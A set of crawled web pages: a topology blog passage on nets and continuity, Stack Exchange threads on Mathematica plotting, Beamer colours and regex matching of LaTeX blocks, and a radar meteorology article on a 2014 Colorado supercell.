B}\bigcap\limits_{i\in\mathcal{I}_b}U_{b,i}\right)=\bigcup\limits_{a\in A}\bigcup\limits_{b\in B}\left(\bigcap\limits_{i\in\mathcal{I}_a}U_{a,i}\cap\bigcap\limits_{i\in\mathcal{I}_b}U_{b,i}\right)$ which is again a union of finite intersections. Similarly, if we take an arbitrary union of these unions of finite intersections, we get another union of finite intersections. And any topology containing the sets in $\sigma$ must contain these sets. So this is exactly the topology generated by $\sigma$. In this case, we call $\sigma$ a subbase for the topology it generates. “Subbase”? What happened to “base”? Well, a base for a topology is sort of halfway in between a subbase and a topology. First of all, we require that the elements of $\sigma$ cover $X$. That is, every point in $X$ shows up in at least one of the sets in $\sigma$. We also require that if $S_1$ and $S_2$ are in $\sigma$ and $x\in S_1\cap S_2$ then there is some $S_3$ in $\sigma$ with $x\in S_3\subseteq S_1\cap S_2$. Thus we can write the intersection of any two elements of $\sigma$ as a union of other elements of $\sigma$. The covering property says that we can write the empty intersection as a union as well. And so we don’t need to take any intersections at all — only unions. That is, a base $\beta$ for a topology $\tau$ on a set $X$ is a collection of subsets of $X$ so that every subset in $\tau$ is a union of subsets in $\beta$. In particular, if we start with any collection of sets $\sigma$ and throw in all the finite intersections of subsets in $\sigma$ we get a base for the topology generated by $\sigma$. Probably the nicest thing about defining a topology with a subbase is that the subbase is all we need to check continuity. More explicitly: let $\sigma\subseteq P(Y)$ be a subbase generating a topology $\tau_Y$ on a set $Y$, and let $(X,\tau_X)$ be any topological space. Then we have defined a function $f:X\rightarrow Y$ to be continuous if $f^{-1}(U)\in\tau_X$ for each $U\in\tau_Y$. What I’m asserting here is that we can weaken this to say that $U\in\sigma$ implies $f^{-1}(U)\in\tau_X$. For then any set in $\tau_Y$ is the union of finite intersections of sets in $\sigma$, and the preimage of such a set is then the union of the finite intersections of the preimages of the sets in $\sigma$. So if these are all open, so will be the preimage of every set in $\tau_Y$. November 22, 2007 Nets and Continuity Okay, so why have we been talking about nets? Because continuous functions look great in terms of nets! First I’ll give you the answer: a function $f:X\rightarrow Y$ is continuous if and only if $f(\lim\Phi)=\lim f\circ\Phi$. To be a little more clear, let’s write $x_\alpha=\Phi(\alpha)$ for $\alpha\in D$. Then $\lim f(x_\alpha)=f(\lim x_\alpha)$. That is, a continuous function preserves the limits — and more generally the accumulation points — of all nets. Now this looks a lot more like algebra than that messy business of pulling back open sets! We can even get a little finer and say that a function $f:X\rightarrow Y$ is continuous at a point $x\in X$ if every net in $X$ that converges to $x$ gets sent to a net in $Y$ converging to $f(x)$. Then we say that a function is continuous if it is continuous at all points of $X$. This should remind us of how we defined continuity at a point by using neighborhood systems, and so we’ll show the equivalence of that definition of continuity and our new one. So, let $X$ and $Y$ have the neighborhood systems $\mathcal{N}_X$ and $\mathcal{N}_Y$, respectively. We’ll assume that for every neighborhood $V\in\mathcal{N}_Y(f(x))$ there is a neighborhood $U\in\mathcal{N}_X(x)$ with $f(U)\subseteq V$. Now if we take a net $x_\alpha$ converging to $x$, we must show that $f(x_\alpha)$ is eventually in $V$ for all $V\in\mathcal{N}_Y(f(x))$. But for each such neighborhood of $f(x)$ we have a neighborhood $U\in\mathcal{N}_X(x)$, and we know that $x_\alpha$ is eventually in $U$. Then $f(x_\alpha)$ must be eventually in $f(U)\subseteq V$, and so $f(x_\alpha)$ converges to $x$. On the other hand, let’s suppose that there is some neighborhood $N$ of $f(x)$ so that no neighborhood of $x$ completely fit into $N$. We’ll construct a net converging to $x$, but whose image doesn’t converge to $f(x)$. For our directed set we take the neighborhood filter $\mathcal{N}(x)$ itself, ordered by inclusion. That is, $U\geq V$ if $U\subseteq V$. Then since $f(U)\nsubseteq N$ there must be some point $x_U\in U$ with $f(x_U)\notin N$. We pick any such point as the value of our net at $U$. Clearly the net $x_U$ is eventually in every neighborhood of $x$, and so the net converges to $x$. But just as clearly, since $f(x_U)$ is not eventually in $N$, the image net can’t converge to $f(x)$. So nets give us a very “algebraic” picture of topological spaces. A topological space is a set $X$ equipped with a (partially-defined) rule that sends every convergent net $\Phi:D\rightarrow X$ to its limit point in $X$, and continuous maps are those which preserve this rule. Still, there’s something different here. Since taking the limit only works on some nets, this “preservation” is to be read in a more logical sense: if the net converges then the image net converges, and we know the answer. However, the image net could easily converge without the original net converging, and then we have no idea what its limit is. This is in contradistinction to the case for algebraic structures, where the algebraic operations are always defined and the connection between source and target structures feels a lot tighter. There’s also a tantalizing connection to category theory, in that our directed sets are categories of a sort. Clearly I’d like to think of a net as some sort of functor, and the limit of a net as being the limit of this functor. But I don’t really see what the target category should be. I could take objects to be points of $X$, but then what are the morphisms? And if the objects aren’t points of $X$, what are they? How does this process of taking a limit correspond to the categorical one? November 21, 2007 Nets, Part II Okay, let’s pick up our characterization of topologies with nets by, well, actually using them to characterize a topology. First we’re going to need yet another way of looking at the points in the closure of a set. Here goes: a point $x$ is in $\mathrm{Cl}(A)$ if and only if every open neighborhood of $x$ has a nonempty intersection with $A$. To see this, remember that the closure of $A$ is the complement of the interior of the complement of $A$. And we defined the interior of the complement of $A$ as the set of points that have at least one open neighborhood completely contained in the complement of $A$. And so the closure of $A$ is the set of points that have no open neighborhoods completely contained in the complement of $A$. So they all touch $A$ somewhere. Cool? Okay, so let’s kick it up to nets. The closure $\mathrm{Cl}(A)$ consists of exactly the accumulation points of nets in $A$. Well, since we know that every accumulation point of a net is the limit of some subnet, we can equivalently say that $\mathrm{Cl}(A)$ consists of the limit points of nets in $A$. So for every point in $\mathrm{Cl}(A)$ we need a net converging to it, and conversely we need to show that the limit of any convergent net in $A$ lands in $\mathrm{Cl}(A)$. First, let’s take an $x\in\mathrm{Cl}(A)$. Then every open neighborhood $U$ of $x$ meets $A$ in a nonempty intersection, and so we can pick an $x_U\in U\cap A$. The collection of all open neighborhoods is partially ordered by inclusion, and we’ll write $U\geq V$ if $U\subseteq V$. Also, for any $U_1$ and $U_2$ we have $U_1\cap U_2\geq U_1$ and $U_1\cap U_2\geq U_2$. Thus the open neighborhoods themselves form a directed set. The function $U\mapsto x_U$ is then a net in $A$. And given any neighborhood $N$ of $x$ there is a neighborhood $U$ contained in $N$. And then for any $V\geq U$ we have $x_V\in V\subseteq U\subseteq N$, so our net is eventually in $N$. Thus we have a net which converges to $x$. Now let’s say $\Phi:D\rightarrow A\subseteq X$ is a net converging to $x\in X$. Then $\Phi$ is eventually in any open neighborhood $U$ of $x$. That is, every open neighborhood of $x$ meets $A$ in at least one point, and thus $x\in\mathrm{Cl}(A)$. So for any $A$, the closure $\mathrm{Cl}(A)$ is the collection of accumulation points of all nets in $A$. And now we can turn this around and define a closure operator by this condition. That is, we specify for each net $\Phi$ the collection of its accumulation points, and from these we derive a topology with this closure operator. Let’s see that we really have a closure operator. First of all, clearly $U\subseteq\mathrm{Cl}(U)$ for all $U$ because we can just take constant nets. Even easier is to see that there are no nets into $\varnothing$, and so its closure is still empty. Any accumulation point of a net in $U\cup V$ is the limit of a subnet, which we can pick to lie completely within either $U$ or $V$, and so $\mathrm{Cl}(U\cup V)=\mathrm{Cl}(U)\cup\mathrm{Cl}(V)$. To finish, we must show that this purported closure operator is idempotent. For this, I’ll use a really nifty trick. A point in $\mathrm{Cl}(\mathrm{Cl}(U))$ is the limit of some net $\Phi:D\rightarrow\mathrm{Cl}(U)$, and each of the points $\Phi(d)$ is the limit of a net $\Phi_d:D_d\rightarrow U$. So let’s build a new directed set by taking the disjoint union $\biguplus\limits_{d\in D}D_d$ and defining the order as follows: if $a\in D_c$ and $b\in D_d$ for $c$ and $d$ in $D$, then $a\geq b$ if $c\geq d$, or if $c=d$ and $a\geq b$ in $D_d$. Then combining the nets $\Phi_d$ we get a net from this new directed set, which clearly has an accumulation point at the limit point of $\Phi$, and which is completely contained within $U$. This completes the verification that $\mathrm{Cl}$ is indeed a closure operator, and thus defines a topology. November 20, 2007 Nets, Part I And now we come to my favorite definition of a topology: that by nets. If you’ve got a fair-to-middling mathematical background you’ve almost certainly seen the notion of a sequence, which picks out a point of a space for each natural number. Nets generalize this to picking out more general collections of points. The essential thing about the natural numbers for sequences is that they’re “directed”. That is, there’s an order on them. It’s a particularly simple order since it’s total — any two elements are comparable — and the underlying set is very easy to understand. We want to consider more general sorts of “directed” sets, and we define them as follows: a directed set ${D}$ is a preorder so that for any two elements $a\in D$ and $b\in D$ we have some $c\in D$ with $c\geq a$ and $c\geq b$. That is, we can always find some point that’s above the two points we started with. $c$ doesn’t have to be distinct from them, though — if $a\geq b$ then $a$ is just such a point. In categorical terms this is not quite the same as saying that our preorder has coproducts, since we don’t require any sort of universality here. We might say instead that we have “weak” binary coproducts, but that might be inessentially multiplying entities, and Ockham don’t play that. However, if we also throw in the existence of “weak” coequalizers — for a pair of arrows $f:A\rightarrow B$ and $g:A\rightarrow B$ there is at least one arrow $h:B\rightarrow C$ so that $h\circ f=h\circ g$ — we get something called a “filtered” category. Since there’s no such thing as a pair of distinct parallel arrows in a preorder, this adds nothing in that case. However, filtered categories show up in the theory of colimits in categories. In fact originally colimits were only defined over filtered index categories $\mathcal{J}$. Anyhow, let’s say we have such a directed set ${D}$ at hand. If it helps, just think of $\mathbb{N}$ with the usual order. A net in a set $X$ is just a function $\Phi:D\rightarrow X$. Now we have a bunch of definitions to talk about how the image of such a function behaves. Given a subset $A\subseteq X$, we say that the net $\Phi$ is “frequently” in $A$ if for any $a\in D$ there is a $b\geq a$ with $\Phi(b)\in A$. We say that the net is “eventually” in $A$ if there is an $a\in D$ so that $\Phi(b)\in A$ for all $b\geq a$. For sequences, the first of these conditions says that no matter how far out the sequence we go we can find a point of the sequence in $A$. The second says that we will not only land in $A$, but stay within $A$ from that point on. Next let’s equip $X$ with a topology defined by a neighborhood system. We say that a net $\Phi:D\rightarrow X$ converges to a point $x\in X$ if for every neighborhood $U\in\mathcal{N}(x)$, the net is eventually in $U$. In this case we call $x$ the limit of $\Phi$. Notice that if ${D}$ has a top element $\omega$ so that $\omega\geq a$ for all $a\in D$ then the limit of $\Phi$ is just $\Phi(\omega)$. In a sense, then, the process of taking a limit is an attempt to say, “if ${D}$ did have a top element, where would it have to go?” Now, a net may not have a limit. A weaker condition is to say that $x\in X$ is an “accumulation point” of the net $\Phi$ if for every neighborhood $U\in\mathcal{N}(x)$ the net is frequently in $U$. For instance, a sequence that jumps back and forth between two points — $\Phi(n)=x$ for even $n$ and $\Phi(n)=y$ for odd $n$ — has both $x$ and $y$ as accumulation points. We see in this example that if we just picked out the even elements of $\mathbb{N}$ we’d have a convergent sequence, so let’s formalize this concept of picking out just some elements of ${D}$. For sequences you might be familiar with finding subsequences by just throwing out some of the indices. However for a general directed set we might not be left with a directed set after we throw away some of its points. Instead, we define a final function $f:D'\rightarrow D$ between directed sets to be one so that for all $d\in D$ there is some $d'\in D'$ so that $a'\geq d'$ implies that $f(a)\geq d$. That is, no matter “how far up” we want to get in ${D}$, we can find some point in $D'$ so that the image of everything above it lands above where we’re looking in ${D}$. For sequences this just says that no matter how far out the natural numbers we march there’s still a point ahead of us that we’re going to keep. Then, given a net $\Phi:D\rightarrow X$ and a final function $f:D'\rightarrow D$ we define the subnet $\Phi\circ f:D'\rightarrow X$. Now the connection between accumulation points and limits is this: if $x$ is an accumulation point of $\Phi$ then there is some subnet of $\Phi$ which converges to $x$. To show this we need to come up with a directed set $D'$ and a final function $f:D'\rightarrow D$ so that $\Phi\circ f$ is eventually in any neighborhood of $x$. We’ll let the points of $D'$ be pairs $(a,U)$ where $a\in D$, $U\in\mathcal{N}(x)$, and $\Phi(a)\in U$. We order these by saying that $(a,U)\geq(b,V)$ if $a\geq b$ and $U\subseteq V$. Given $(a,U)$ and $(b,V)$ in $D'$, then $U\cap V$ is again a neighborhood of $x$, and so $\Phi$ is frequently in $U\cap V$. Thus there is a $c$ with $c\geq a$, $c\geq b$, and $\Phi(c)\in U\cap V$. Thus $(c,U\cap V)$ is in $D'$, and is above both $(a,U)$ and $(b,V)$, which shows that $D'$ is directed. We can easily check that the function $f:D'\rightarrow D$ defined by $f(a,U)=a$ is final, and thus defines a subnet $\Phi\circ f$ of $\Phi$. Now if $N\in\mathcal{N}(x)$ is any neighborhood of $x$, then there is some $\Phi(b)\in N$. If $(a,U)\geq(b,N)$ then $\Phi(f(a,U))=\Phi(a)\in U\subseteq N$. Thus $\Phi\circ f$ is eventually in $N$. Conversely, if $\Phi$ has a limit $x$ then $x$ is clearly an accumulation point of $\Phi$. November 19, 2007 Continuity redux So now we have two new ways to talk about topologies: neighborhoods, and closure operators. We can turn around and talk about continuity directly in our new languages, rather than translating them into the open set definition we started with. First let’s tackle neighborhoods. Remember that a continuous function $f$ from a topological space $(X,\tau_X)$ to $(Y,\tau_Y)$ is one which pulls back open sets. That is, to every open set $V\in\tau_Y$ there is an open set $f^{-1}(V)\in\tau_X$ which $f$ sends into $V$. But in the neighborhood definition we don’t have open sets at the beginning; we just have neighborhoods of points. What we do is notice that a neighborhood $N$ of a point $y$ is a set which contains an open set $V$ containing $x$. In particular we can consider neighborhoods of a point $f(x)$. The the preimage $f^{-1}(V)$ is an open set containing $x$, which is a neighborhood! So, given a neighborhood $V$ of $f(x)$ there is a neighborhood $U$ of $x$ so that $f(U)\subseteq V$. This is an implication of the definition of continuity written in the language of neighborhoods, and it turns out that we can turn around and derive our definition of continuity from this condition. To this end, we consider sets $X$ and $Y$ with neighborhood systems $\mathcal{N}_X$ and $\mathcal{N}_Y$, respectively. We will say that a function $f:X\rightarrow Y$ is continuous at $x$ if for every neighborhood $V\in\mathcal{N}_Y(f(x))$ there is a neighborhood $U\in\mathcal{N}_X(x)$ so that $f(U)\subseteq V$, and that $f$ is continuous if it is continuous at each point in $X$. Now, let $V$ be an open set in $Y$. That is, a set which is a neighborhood of each of its points. We must now show that $f^{-1}(V)$ is a neighborhood of each of its points. So consider such a point $x\in f^{-1}(V)$, and its image $f(x)\in V$ Since we are assuming that $V$ is a neighborhood of $f(x)$, there must be a neighborhood $U$ of $x$ so that $f(U)\subseteq V$. But then $U\subseteq f^{-1}(V)$, and since the neighborhoods of $x$ form a filter this means $f^{-1}(V)$ is a neighborhood as well. Thus the preimage of an open set is open. In particular, we can consider a set $T\subseteq Y$ and its interior $\mathbf{int}_Y(T)$, which is an open set contained in $T$. And so its preimage $f^{-1}(\mathrm{int}_Y(T))$ is an open set contained in $f^{-1}(T)$. Thus we see that $f^{-1}(\mathrm{int}_Y(T))\subseteq\mathrm{int}_X(f^{-1}(T))$. Finally, we can dualize this property to see that $f(\mathrm{Cl}_X(S))\subseteq\mathrm{Cl}_Y(f(S))$. That is, the image of the closure of $S$ is contained in the closure of the image of $S$ for all subsets $S\subseteq X$. Let’s now take this as our definition of continuity, and derive the original definition from it. Well, first let’s just dualize this condition to get back to say that $f^{-1}(\mathrm{int}_Y(T))\subseteq\mathrm{int}_X(f^{-1}(T))$ for all sets $T\subseteq Y$. Now any open set $V$ is its own interior, so $f^{-1}(V)\subseteq\mathrm{int}_X(f^{-1}(V))$. But $\mathrm{int}_X(f^{-1}(V))\subseteq f^{-1}(V)$ by the definition of the interior. And so $f^{-1}(V)$ is its own interior, and is thus open. November 16, 2007
2016-06-26 09:58:07
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 852, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9371011853218079, "perplexity": 3118.602746987314}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-26/segments/1466783395160.19/warc/CC-MAIN-20160624154955-00152-ip-10-164-35-72.ec2.internal.warc.gz"}
https://mathematica.stackexchange.com/questions/151602/plotf-x-xmin-xmax-is-resulting-in-an-empty-graph?noredirect=1
# Plot[f,{x,xmin,xmax] is resulting in an empty graph I am trying to plot this function (FvD) with respect to x. It results in an empty graph. A11 = 6.8*10^-20 A22 = 5.0*10^-20 A33 = 3.7*10^-20 E0 = 8.854188 E3 = 79.99 kB = 1.38064852*10^-23 T = 298 e = 1.60217662*10^-19 z = 1 h = 6.62607004*10^-34 n00 = 6.022148086*10^24 ye1 = -35*10^-3 ye2 = -45*10^-3 A132 = (Sqrt[A11] - Sqrt[A33])*(Sqrt[A22] - Sqrt[A33]) vdW = -A132/(6*Pi*x^3) k = 1/(Sqrt[(E0*E3*kB*T)/(2*e^2*z^2*n00)]) Y1 = (z*e*ye1)/(kB*T) Y2 = (z*e*ye2)/(kB*T) ElDL = n00*kB* T*(2*Sqrt[(1 + 0.25*(Y1 + Y2)^2*Csch[(k*x/2)]^2)] - (((Y1 - Y2)^2* Exp[-k*x])/(1 + 0.25*(Y1 + Y2)^2*Csch[(k*x/2)]^2)) - 2) DisPressure = ElDL + vdW FvD[x] = 2*Pi*(-\[Integral]DisPressure \[DifferentialD]x) Plot[FvD[x], {x, 1*10^-9, 1000*10^-9}] What should I do? • Post code in code blocks (use { } icon), not pictures of code. – Bob Hanlon Jul 16 '17 at 15:27 • If I haven't made a mistake, Plot[{Re[FvD], Im[FvD]}, {x, 10^-9, 200*10^-9}] shows FvD is complex. And there is a little bit of uncertainty from the floating point constants. – Bill Jul 16 '17 at 15:35 • Hi, I have now updated my question and the code is posted in code blocks. I am new to Mathematica and I am struggling a lot to make this plot work. – Askild Jul 17 '17 at 9:53 1. To define your function you need to use a Pattern in the left hand side. Reference: 2. The output of your function is complex; see However regarding (2) the imaginary part is nearly constant so I think you want only the real. Apparent solution: FvD[x_] = 2*Pi*(-∫DisPressure \[DifferentialD]x); Plot[Re @ FvD[x], {x, 1*10^-9, 1000*10^-9}, PlotRange -> All] • Thank you for helping me @Mr.Wizard. I have updated my code like you described above. However, now I receive this comment: Set::write: Tag Times in (2 \[Pi] (-(5.67161*10^-23/x^2)+49554.2 x+<<1>>/Sqrt[<<1>>]+(368.13 2.71828^(-651.462 x) <<4>> (3.85257 +Cosh[162.866 x]^2+Sinh[162.866 x]^2))/((0.412153 +1. Csch[<<1>>]^2) (-154.867 2.71828^Times[<<2>>] <<4>> Sinh[Times[<<2>>]] (-1.+Power[<<2>>]+Power[<<2>>])+<<6>>+<<20>> <<5>> (<<1>>)))))[x_] is Protected. – Askild Jul 17 '17 at 10:54 • @Askild You should restart Mathematica (or at least the Kernel) before evaluating the modified code. If you still receive that error please see mathematica.stackexchange.com/q/11982/121 (ps: I just noticed that I uploaded a slightly different plot; I have corrected that so that it agrees with the code in my answer above.) – Mr.Wizard Jul 17 '17 at 11:22
2019-12-15 12:57:01
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.25432032346725464, "perplexity": 4305.791801603042}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575541308149.76/warc/CC-MAIN-20191215122056-20191215150056-00019.warc.gz"}
https://tex.stackexchange.com/questions/365097/beamer-metropolis-colors
# Beamer Metropolis Colors In the beamer metropolis package one is capable to highlight text using the \alert{} command in orange. Further it is possible to create a block, where the header is in the same color \begin{alertblock} --- \end{alertblock}. My question now is, if it is possible to use the color of \begin{exampleblock} --- \end{exampleblock} to highlight text in green?. Either I don't find it using the documentation or it is really not possible. If so, how can I select the color using for example the \usepackage{color} and the respective command \textcolor{}{}? Here the respective blocks as found on the template on Overleaf: • You mean something along the line of \setbeamercolor{alerted text}{fg=green!80!black} ? – Moriambar Apr 17 '17 at 10:51 You could just open the beamercolorthememetropolis.sty from your TeX distribution (OS search does it for you). There you would find something like: \definecolor{mLightBrown}{HTML}{EB811B} \definecolor{mLightGreen}{HTML}{14B03D} and following \setbeamercolor{example text}{% fg=mLightGreen } So you could use \textcolor{mLightGreen}{Text}. MWE: \documentclass{beamer} \usetheme{metropolis} \begin{document} \begin{frame} Test \begin{exampleblock}{Test} ASDF \end{exampleblock} \textcolor{mLightGreen}{\bfseries Test}\\ \textcolor{mLightGreen}{Test} \end{frame} \end{document}
2020-02-21 04:05:05
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7501527667045593, "perplexity": 2184.129768901307}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875145438.12/warc/CC-MAIN-20200221014826-20200221044826-00375.warc.gz"}
https://unix.stackexchange.com/questions/159307/to-match-only-innermost-environment-by-regex
# To match only innermost environment by Regex I want to match the innermost environment of begin{question} and its corresponding end{question}. Example data \section{Takayasu arteritis} \begin{question} {You get a patient. What do you notice first in this patient?} Absence of peripheral pulse. \end{question} \begin{question} {What was the first Takayasu case?} Young woman in Asia with red vessels in the eye. So special eye diagnosis done. Affects eye. \end{question} Fever of unknown origin can be used when you do not know what is causing the disease. % Show cases in MedScape and ask class. Aneurysms. \subsection{Treatment} \begin{question} {What you should always include in Takayasu treatment? What are the symptoms?} Blood pressure. Aneurysms which will burst without treatment. So blood pressure decreasing drugs like beta blockers along in combination with other drugs. \end{question} My expected output is \begin{question} {You get a patient. What do you notice first in this patient?} Absence of peripheral pulse. \end{question} or \begin{question} {What was the first Takayasu case?} Young woman in Asia with red vessels in the eye. So special eye diagnosis done. Affects eye. \end{question} or \begin{question} {What you should always include in Takayasu treatment? What are the symptoms?} Blood pressure. Aneurysms which will burst without treatment. So blood pressure decreasing drugs like beta blockers along in combination with other drugs. \end{question} How can you match only the innermost environment? • What's your expected output? – Avinash Raj Oct 4 '14 at 20:50 • @AvinashRaj Thank you for your comment! I added the expected output. – Léo Léopold Hertz 준영 Oct 4 '14 at 20:52 • This regex will do the job (?s)\\begin{question}.*?\\end{question} but i don't know how to implement it in Perl. – Avinash Raj Oct 4 '14 at 20:55 • Here pcregrep -M '(?s)\\begin{question}.*?\\end{question}' file – Avinash Raj Oct 4 '14 at 21:24 Try this: pcregrep -M '\\begin{question}(.|\n)*?\\end{question}' Explanation: • pcregrep: grep with Perl-compatible regular expressions • -M: Allow patterns to match more than one line • (.|\n)*?: any normal character . or new line \n matched zero or more times ., in non-greedy mode ?. Result: \begin{question} {You get a patient. What do you notice first in this patient?} Absence of peripheral pulse. \end{question} \begin{question} {What was the first Takayasu case?} Young woman in Asia with red vessels in the eye. So special eye diagnosis done. Affects eye. \end{question} \begin{question} {What you should always include in Takayasu treatment? What are the symptoms?} Blood pressure. Aneurysms which will burst without treatment. So blood pressure decreasing drugs like beta blockers along in combination with other drugs. \end{question} • even more simpler pcregrep -M '\\begin{question}[\S\s]*?\\end{question}' file – Avinash Raj Oct 4 '14 at 21:22 Do you need it to be a pure regex solution, or just perlish? perl -lne 'print if(/^\\begin{question}/ .. /^\\end{question}/)' file
2019-07-16 08:38:06
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5124038457870483, "perplexity": 12569.06788715797}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-30/segments/1563195524517.31/warc/CC-MAIN-20190716075153-20190716101153-00007.warc.gz"}
http://www.chill.colostate.edu/w/Mesocyclone_observed_in_the_FRONT_network_by_the_NCAR_S-POL_and_CSU-CHILL_radars:_21_May_2014
# Mesocyclone observed in the FRONT network by the NCAR S-POL and CSU-CHILL radars: 21 May 2014 Authors: P. C. Kennedy and S. Yuter CSU-CHILL reflectivity data collected in a 0.5 degree elevation angle PPI scan through a supercell thunderstorm located just south of the Denver International Airport at 2047 UTC on 21 May 2014. On this date, Front Range Observational Network Testbed (FRONT) operations were being conducted by the NCAR S-Pol and CSU-CHILL radars in support of the North Carolina State University ROSE (Radar Observations of Storms for Education) project. Example dual-Doppler and dual polarization plots have been prepared. ## Introduction During the afternoon hours of 21 May 2014, the NCAR S-Pol and CSU-CHILL radars were collecting data for Prof. Sandra Yuter's ROSE (Radar Observations of Storms for Education) NSF-funded project. These two NSF research radars anchor the Front Range Observational Network Testbed (FRONT). To support dual-Doppler analyses, the ROSE project data collection procedures set the antenna control programs at both radars to synchronize the starting times of their scan sequences. A supercell thunderstorm that developed over the northeastern Denver area and then passed just south of Denver Internatiional Airport was observed in the course of the synchronized ROSE project scans. This article presents basic "snapshot" data plots obtained from a single synchronized volume scan collected on 21 May 2014 by the FRONT research radars during the ROSE project. ## Dual Doppler-based horizontal wind fields at 2.6 km MSL During the volume scan that started at 2053:20 UTC, the supercell's hook echo had moved into the southern extremity of the east lobe of the S-Pol - CSU-CHILL radar pair. Within this lobe, the radial velocity measurements obtained by the two radars were from sufficiently different directions to support the accurate synthesis of the horizontal wind field. The following plot shows the resultant dual Doppler wind field synthesis obtained at a height of 2.6 km MSL (approximately 1 km AGL). To support this analysis, the input polar coordinate data from each radar was interpolated to a common Cartesian grid using the NCAR SPRINT program. The horizontal grid mesh is 0.5 km and the grid origin is at CSU-CHILL. The NCAR CEDRIC program synthesized the horizontal wind field from the two gridded radial velocity input fields. The mesocyclone circulation pattern is evident centered near the tip of the hook echo. The Storm Prediction Center (SPC) files contain several tornado reports in association with this storm SPC reports. The plot has been annotated with the location of the SPC report of a tornado at Watkins, CO at 2045 UTC (~8 minutes before the analysis time). ## Selected S-Pol dual polarization data fields At 2053:20 UTC, the storm was at closer range to S-Pol than to CSU-CHILL. For this reason, data from an S-Pol 0.4° elevation PPI sweep was selected to show the dual-polarization characteristics of the storm's precipitation at near-surface heights. The data shown in the following SOLO plot was subjectively thresholded / edited to remove ground clutter and non-precipitation clear air echo. An irregular boundary was drawn in the reflectivity (upper left) to identify the combined echo core and hook appendage regions. The differential propagation phase ($\psi_{dp}$) field shown in the upper right indicates that phase shifts due to the presence of heavy rain (i.e. containing large oblate drops) were accumulating in both the echo core and hook areas. The text of the NWS warnings issued for this storm consistently noted that rain wrapping around the mesocyclone would make visual tornado detection difficult. The ~0 dB differential reflectivities $Z_{dr}$ (lower left), and enhanced linear depolarization levels ($L_{dr}$; lower right) indicate that hailstones were also a major component of the precipitation within the irregular boundary. Surface observations confirmed the presence of heavy rain and hail. At 2053 UTC the METAR observation taken at Denver International Airport ((KDEN); located ~13 km northwest of the tip of the hook) included a visibility of 1 statute mile due to present weather conditions of a thunderstorm with heavy rain and small hail (+TSRAGS). ## Summary The ROSE project is the first NSF-sponsored field project supported by the FRONT network. The life cycle of a supercell thunderstorm observed by the FRONT research radars on 21 May 2014 should provide a useful addition to the library of educational cases that the ROSE project is designed to assemble.
2019-02-17 13:26:26
